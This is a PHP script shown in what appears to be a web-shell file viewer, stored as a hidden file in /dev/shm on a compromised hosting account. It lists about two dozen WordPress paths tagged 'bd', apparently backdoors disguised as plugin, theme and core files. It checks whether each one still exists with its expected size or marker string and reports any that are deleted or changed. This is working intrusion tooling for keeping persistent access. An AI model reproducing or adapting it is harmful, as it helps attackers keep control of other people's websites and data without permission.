| Path : /dev/shm/ |
|
|
| Current File : //dev/shm/.record |
<?php $r = '/home/dermnyll/creativemonk.agency'; $x = ["/sashasholiday/wp-content/plugins-old/updraftplus/example-decrypt.php"=>"bd@@244602380@@data_storage",
"/umangjindal/wp-content/plugins/extendify/app/Shared/Services/PluginDependencies/Forms/tcpdf.php"=>"bd@@244498704@@1778",
"/wp-content/themes/index.php"=>"bd@@245481516@@sync_manager",
"/sashasholiday/wp-content/plugins-old/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/cat_lang_edit.php"=>"bd@@244602422@@672",
"/umangjindal/wp-content/plugins/jetpack/modules/widgets/authors.php"=>"bd@@245461051@@buffer_cache",
"/umangjindal/wp-content/themes/sinatra/inc/customizer/controls/select/class.sinatra.customizer.control.select.php"=>"bd@@244602429@@2205",
"/sashasholiday/wp-admin-old/network/user-new.php"=>"bd@@245481533@@hub_center",
"/umangjindal/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Constants/cms.php"=>"bd@@245481535@@1792",
"/sashasholiday/wp-content/plugins-old-2/elementor/vendor_prefixed/twig/twig/twig/src/Profiler/Dumper/index_old.php"=>"bd@@245481537@@614",
"/sashasholiday/wp-content/plugins-old/elementor-pro/modules/forms/submissions/data/forms.php"=>"bd@@244602437@@1643",
"/sashasholiday/wp-content/plugins-old-2/elementor-pro/core/app/modules/import-export/runners/revert/invoice.php"=>"bd@@245481541@@1805",
"/sashasholiday/wp-content/plugins-old-2/elementor/vendor_prefixed/twig/twig/twig/src/Extension/viatge.php"=>"bd@@245481544@@577",
"/sashasholiday/wp-admin-old/update-core.php"=>"bd@@244517023@@service_registry",
"/32next.php"=>"bd@@244563617@@1033",
"/sashasholiday/wp-content/plugins-old-2/elementor-pro/modules/notes/data/endpoints/summary.status.php"=>"bd@@245461166@@713",
"/sashasholiday/wp-content/plugins-old-2/elementor/core/common/modules/connect/connect.php"=>"bd@@245461167@@1602",
"/umangjindal/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Plugin/Mock/users_add.php"=>"bd@@244483262@@1988",
"/sashasholiday/wp-content/plugins-old/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Plugin/Oauth/feedcreator.php"=>"bd@@244517104@@676",
"/sashasholiday/wp-content/plugins-old/jeg-elementor-kit/lib/jeg-element/includes/class/beaver/control/dynamic.php"=>"bd@@244517108@@652",
"/sashasholiday/wp-content/plugins-old/elementor/vendor_prefixed/twig/twig/twig/src/Extension/googlecart.php"=>"bd@@244517110@@1545",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@245460964@@token_parser_engine",
"/sashasholiday/wp-content/plugins-old-2/all-in-one-wp-migration/lib/view/schedules/index.php"=>"bd@@246110492@@12797",
"/sashasholiday/wp-content/plugins-old-2/all-in-one-wp-migration/lib/view/import/button-pcloud.php"=>"bd@@246665004@@2679"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');